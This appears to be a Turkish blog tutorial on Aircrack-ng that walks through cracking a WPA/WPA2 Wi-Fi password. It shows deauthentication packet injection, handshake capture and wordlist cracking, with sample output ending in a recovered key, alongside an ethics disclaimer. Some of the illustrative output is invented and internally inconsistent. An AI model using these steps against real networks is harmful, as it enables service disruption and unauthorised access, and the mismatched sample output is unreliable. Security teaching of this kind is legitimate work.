- Published on
Aircrack-ng Nedir Nasıl Kullanılır
- Authors
- Name
- Muhammed Ali Falcıoğlu
- @lyserian
Aircrack-ng Nedir?
Aircrack-ng, kablosuz ağlarda güvenlik testleri yapmak için kullanılan bir açık kaynaklı bir yazılım paketidir. Temel olarak, WEP ve WPA/WPA2-PSK gibi kablosuz ağ güvenlik protokollerini analiz etmek, kırarak ve çözümleyerek şifreleri çözmeyi amaçlar. Aircrack-ng, birçok farklı aracı içeren bir pakettir ve bu araçlar, kablosuz ağ güvenliğini test etmek için bir dizi işlemi gerçekleştirmek üzere tasarlanmıştır.
Aircrack-ng'nin temel özellikleri
Paket Yakalama: Aircrack-ng, kablosuz ağlardan gelen veri paketlerini yakalayabilir. Bu, ağ trafiğini analiz etmek ve ağ güvenliğini değerlendirmek için önemlidir.
WEP Kırma: Aircrack-ng, WEP (Wired Equivalent Privacy) şifreleme protokolünü kırmak için kullanılabilir. WEP, artık güvenli kabul edilmediği için bu özellik eskimiştir, ancak hala eğitim ve test amaçlarıyla kullanılabilir.
WPA/WPA2 Kırma: Aircrack-ng, WPA (Wi-Fi Protected Access) ve WPA2-PSK şifreleme protokollerini kırmak için kullanılabilir. Bu, güvenlik zayıflıklarını belirlemek ve güvenliği iyileştirmek için kullanılabilir.
Kablosuz Ağ Analizi: Aircrack-ng, kablosuz ağlarla ilgili geniş bir analiz yapabilir. Bu, ağ trafiğini incelemek, ağları keşfetmek ve güvenlik açıklarını belirlemek için kullanılabilir.
WPS Saldırıları: Aircrack-ng, Wi-Fi Protected Setup (WPS) protokolü üzerinde saldırılar gerçekleştirmek için kullanılabilir. WPS, genellikle güvenlik zayıflıklarıyla ilişkilendirilmiştir ve Aircrack-ng bu zayıflıkları test etmek için kullanılabilir.
Aircrack-ng Kurulum
sudo apt-get install aircrack-ng
Aircrack-ng, macOS ve Windows gibi diğer işletim sistemlerinde de kullanılabilir, ancak kurulum süreci biraz farklı olabilir. Bu işletim sistemleri için Aircrack-ng'nin resmi web sitesinden veya uygun paket yöneticilerinden indirilebilir ve kurulabilir.
Aircrack-ng'yi kurduktan sonra, komut satırından kullanılabilir. Başlıca araçları arasında airodump-ng
(ağ trafiğini izleme), aireplay-ng
(paket enjeksiyonu) ve aircrack-ng
(şifre kırma) bulunmaktadır. Kullanımı hakkında daha fazla bilgi almak için, terminalde
aircrack-ng --help
komutunu kullanabilir veya Aircrack-ng belgelerini inceleyebilirsiniz.
Aircrack-ng Nasıl Kullanılır?
- airodump-ng:
Ağ trafiğini izlemek, kablosuz ağları taramak ve yakındaki erişim noktalarını listelemek için kullanılır. Örnek Kullanım:
airodump-ng wlan0
- aireplay-ng:
Paket enjeksiyonu için kullanılır. Bu, ağdaki trafiği manipüle etmek için kullanılır ve bazı saldırılar için gereklidir. Örnek Kullanım:
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0
- aircrack-ng:
Şifre kırma aracıdır. Elde edilen WEP/WPA/WPA2 şifrelerini kırmak için kullanılır. Örnek Kullanım (WEP):
aircrack-ng -b AA:BB:CC:DD:EE:FF captured_data.cap
Örnek Kullanım (WPA/WPA2):
aircrack-ng -w wordlist.txt captured_data.cap
- Gerçekleştirilecek Adımlar:
- İlk olarak,
airodump-ng
komutuyla hedeflenen kablosuz ağı belirleyin ve trafiği izleyin. - Ardından,
airodump-ng
komutuyla hedeflenen ağın ESSID'sini ve BSSID'sini (MAC adresi) belirleyin. - İsteğe bağlı olarak,
aireplay-ng
komutunu kullanarak paket enjeksiyonu gerçekleştirin ve ağ trafiğini manipüle edin. - Son olarak,
aircrack-ng
komutunu kullanarak şifreyi kırmak için elde edilen veri dosyasını ve bir şifre listesini (wordlist) belirtin.
- Wordlist Hazırlama:
Aircrack-ng ile WPA/WPA2 şifre kırma yapacaksanız, kullanılacak bir wordlist (şifre listesi) oluşturmanız gerekebilir. Bu, çeşitli şifreleri denemek için kullanılır.
Önemli Notlar:
Aircrack-ng gibi araçların yalnızca yasal ve etik
amaçlar için kullanılması gerekmektedir. Aircrack-ng, güvenliği zayıf olan ağları tespit etmek ve iyileştirmek için kullanılmalıdır. Bilgi hırsızlığı veya izinsiz erişim gibi kötü niyetli amaçlarla kullanılması yasa dışıdır ve ciddi sonuçları olabilir
.
Aircrack-ng'nin temel kullanımına yönelik bir örnek
Diyelim ki "mafsec_wifi" adında bir kablosuz ağa sahip olduğumuzu ve bu ağın BSSID'sinin "AA:BB:CC:DD:EE:FF" olduğunu varsayalım. Ağda WPA/WPA2 şifreleme kullanıldığını düşünelim ve şifreyi kırmak istiyoruz. Ayrıca, şifreyi kırmak için kullanılacak bir wordlist dosyamızın olduğunu farz edelim.
1. Öncelikle, airodump-ng
aracını kullanarak hedeflenen kablosuz ağı belirleyeceğiz ve trafiği izleyeceğiz:
airodump-ng wlan0
Bu komut çıktısında "mafsec_wifi" adındaki ağın BSSID
'sini ve diğer bilgileri görebiliriz.
CH 6 ][ Elapsed: 10 s ][ 2024-04-03 16:30 ][ WPA handshake: AA:BB:CC:DD:EE:FF ][ WPA2 CCMP PSK - Network: mafsec_wifi ][ LANforgeWiFi ]
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -43 60 15 2 6 54e WPA2 CCMP PSK mafsec_wifi
11:22:33:44:55:66 -55 40 10 1 6 54e WPA2 CCMP PSK my_wifi
22:33:44:55:66:77 -60 30 5 0 6 54e WPA CCMP PSK home_wifi
33:44:55:66:77:88 -70 20 3 0 6 54e WPA2 CCMP PSK office_wifi
- CH: Kanal numarasını gösterir.
- Elapsed: Komutun çalışma süresini gösterir.
- 2024-04-03 16:30: Zaman damgasını gösterir.
- WPA handshake: WPA şifre el sıkışması olduğunu belirtir.
- WPA2 CCMP PSK: Kullanılan güvenlik protokollerini gösterir.
- Network: Kablosuz ağın adını (ESSID) gösterir.
- BSSID: Kablosuz ağın MAC adresini gösterir.
- PWR: Sinyal gücünü (dBm cinsinden) gösterir.
- Beacons: Beacon (işaret) paketlerinin sayısını gösterir.
- #Data, #/s: Veri paketlerinin sayısını ve saniyede alınan paketlerin ortalama sayısını gösterir.
- MB: Maksimum bağlantı hızını (megabit/saniye cinsinden) gösterir.
- ENC: Şifreleme türünü (WEP, WPA, WPA2) gösterir.
- CIPHER: Kullanılan şifreleme algoritmasını gösterir.
- AUTH: Kimlik doğrulama yöntemini (örneğin, PSK) gösterir.
- ESSID: Kablosuz ağın adını gösterir.
2. Ardından, hedeflenen ağı ve istasyonları belirterek airodump-ng
'yi başka bir terminal penceresinde çalıştıracağız.
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c <kanal_numarası> -w captured_data wlan0
Burada <kanal_numarası>
yerine hedeflenen ağın kanal numarasını ve captured_data
ise yakalanan veri paketlerinin kaydedileceği dosya adını belirtiyoruz.
3. aireplay-ng
aracını kullanarak paket enjeksiyonu gerçekleştirebiliriz.
aireplay-ng -0 50 -a AA:BB:CC:DD:EE:FF wlan0
Bu komut, 50 adet deauthentication
paketi göndererek hedeflenen istemcilerin ağdan atılmasını sağlar.
4. Son olarak, aircrack-ng
aracını kullanarak şifreyi kırmak için elde edilen veri dosyasını ve wordlist dosyasını belirtiyoruz.
aircrack-ng -w wordlist.txt captured_data-01.cap
Burada wordlist.txt
, kullanılacak şifre listesi dosyasını temsil eder ve captured_data-01.cap
, airodump-ng tarafından kaydedilen veri dosyasının adını gösterir.
Opening captured_data-01.cap
Read 10000 packets.
# BSSID ESSID Encryption
1 00:11:22:33:44:55 example_wifi WPA (1 handshake)
Choosing first network as target.
Opening captured_data-01.cap
Reading packets, please wait...
Aircrack-ng 1.6
[00:00:00] 10000 keys tested (0.19 k/s)
KEY FOUND! [ password123 ]
Master Key : AA:BB:CC:DD:EE:FF 11:22:33:44:55:66
Pairwise Key : DE:AD:BE:EF:12:34
PMK Name (SSID) : mafsec_wifi
5. Diğer.
- Eğer kali linux üzerinden bu işlemleri yapıyorsanız (deauthentication) bir wifi kart'a ihtiyacınız olacak.
- wifi kartınızı taktıktan sonra monitör modunu destekleyen wifi kartlarınızı görmek için aşağıdaki kodu yazın.
airmon-ng
Interface Chipset Driver
wlan0 Intel 6205 iwlwifi - [phy0]
İnterface yazan yerin altında sizin monitor kartınızın adı yazmaktadır.
- Monitör modu aktif etmek için aşağıdaki kodu yazın.
airmon-ng start wlan0
Ancak, aircrack-ng
'nin özellikleri bununla sınırlı değildir. Daha fazla bilgi edinmek isterseniz, aircrack-ng'nin resmi web sitesinden dökümantasyonları inceleyebilirsiniz.